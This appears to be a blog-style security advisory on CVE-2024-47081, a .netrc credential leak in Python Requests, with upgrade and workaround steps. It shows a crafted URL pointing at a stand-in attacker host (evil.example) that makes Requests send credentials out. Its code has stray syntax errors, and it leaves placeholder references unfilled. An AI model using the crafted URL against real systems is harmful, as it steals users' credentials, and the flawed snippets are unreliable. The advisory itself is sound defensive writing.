CVE-2024-47081 - Critical Credential Leak in Python Requests Library – How to Protect Yourself

Summary:
A severe vulnerability—CVE-2024-47081—affecting the popular Python Requests HTTP library has been discovered. Anyone using Requests versions *before* 2.32.4 could unknowingly leak sensitive .netrc credentials to third parties, putting accounts and infrastructure at serious risk. This post will break down how the bug works, what code is vulnerable, and precise steps you must take to safeguard your credentials.

What is the Requests Library?

If you’re using Python for web scraping, APIs, or microservices, you probably rely on Requests, a user-friendly HTTP client package. It's widely adopted for its simplicity:

import requests
response = requests.get('https://example.com';)
print(response.text)

Requests can automatically use .netrc files for authentication—a file that stores usernames and passwords for various remote destinations.

The Vulnerability: CVE-2024-47081 Explained

What’s wrong?
A *URL parsing bug* means crafted URLs can trick Requests into sending your .netrc credentials to attackers, instead of the intended server.

How? By using tricky URL formats, a malicious site could get credentials for a host you trust (api.goodsite.com), just by getting you to access something like:

https://api.goodsite.com@evil.example/path

Here, Requests might extract .netrc credentials intended for api.goodsite.com, but send them to evil.example. That’s devastating if those credentials unlock sensitive resources.

Affected versions:

Let’s see what a vulnerable piece of code could look like

import requests

# Imagine .netrc has credentials for 'api.goodsite.com'
url = "https://api.goodsite.com@evil.example/callback";
resp = requests.get(url)

If you’re running this on Requests 2.32.3 or earlier, and you have credentials for api.goodsite.com in your .netrc file, your credentials will be sent over the wire to evil.example.

Why Is This So Dangerous?

- .netrc files often store credentials for critical internal APIs, cloud endpoints, or version control servers.
- The attack just needs you to request a maliciously formatted URL (could be via redirects, links, or third-party scripts).
- Credentials might be tokens or passwords that grant API/root access.

1. Upgrade Requests Immediately

Solution:
Install version 2.32.4 or later.

pip install --upgrade requests
# Confirm the version
python -c "import requests; print(requests.__version__)"

- Requests 2.32.4 release notes

If you CAN’T upgrade right away, use this workaround

import requests

session = requests.Session()
session.trust_env = False  # disables loading .netrc automatically

response = session.get("https://api.goodsite.com@evil.example/callback";)

Note: This disables ALL use of .netrc. If your scripts depend on that, watch out.

Further Reading and References

- Official CVE Record: CVE-2024-47081
- Requests GitHub Security Advisory *(replace with actual link when available)*
- Commit fixing the bug *(replace with actual commit hash)*

Upgrade: If you use Requests, get to 2.32.4+ ASAP.

- Audit URLs: Sanitize untrusted URLs and never let third parties control hostnames/URLs to which you send credentials.
- Disable .netrc: If you can't upgrade, set trust_env=False in your Sessions as a temporary measure.

This vulnerability is serious and much easier to exploit than most people realize. If you rely on Python Requests in production systems—or even for local automation—take action now to avoid leaking private credentials.

Timeline

Published on: 06/09/2025 18:15:24 UTC
Last modified on: 06/12/2025 16:06:47 UTC